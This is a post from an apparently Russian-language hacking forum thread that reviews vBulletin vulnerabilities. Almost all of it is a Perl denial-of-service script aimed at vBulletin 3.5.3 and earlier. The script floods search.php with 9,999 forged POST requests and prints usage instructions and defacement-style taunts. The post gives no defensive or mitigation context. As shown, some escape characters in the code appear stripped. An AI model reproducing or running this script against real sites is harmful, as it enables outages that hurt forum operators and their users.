Тема: [Обзор уязвимостей vBulletin]
Показать сообщение отдельно

vBulletin <=3.5.3 Search DoS
  #6  
Старый 04.01.2008, 19:05
Mo4x
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
С нами: 10119206

Репутация: 412
По умолчанию vBulletin <=3.5.3 Search DoS
vBulletin <=3.5.3 Search DoS


Код:
#!/usr/bin/perl
##########################################
# vBdos.pl - vBulletin <=3.5.3 Search DoS
#
# Written by spic of g00ns
##########################################
# Contact
# Site: www.g00ns.net and www.g00ns-forum.net
# Email: spic <at> g00ns.net
# IRC: irc.g00ns.net #g00ns
##########################################
# Example
# vBdos.pl www.avbforum.com /vbulletin/
##########################################

print q{
____________________________________________________________________________
____ ____ ____ ____ _ __ ____ ____ _ __ ____ _____ ____ __ ___
/ __// __//_ // __// |/ // __// _// |/ // __/ / ___// __ / |/ /
_ / _/ / // _/ / /_ _/ / / /_ _ / /__ / /_/ // /|_/ /
/___//___/ /_//___//_/|_//___//___//_/|_//___/(_)___/ ____//_/ /_/
____________________________________________________________________________

};

use IO::Socket;
$server= $ARGV[0];
$path=$ARGV[1];


while($x != 9999)
{
$post =

"search_keywords=Se7enSins+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=ms

gonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

$lrg = length $post;


if(!$server||!$path)
{
print " vBulletin DoS by spic of g00ns nn";

print " Exploit code found on Se7enSins.com nn";

print " n00bFRAGGER was here... nn";

print " usage: VBDoS.pl <host without http> <directory> nn";
exit();
}



my $sock = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;


print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n";
print $sock "Host: $servern";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $servern";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20050511 Firefox/1.0.5n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postn";
close($sock);


syswrite STDOUT,".";

$x++;
}

##########################################
Последний раз редактировалось Elekt; 03.09.2008 в 02:39..
 
Ответить с цитированием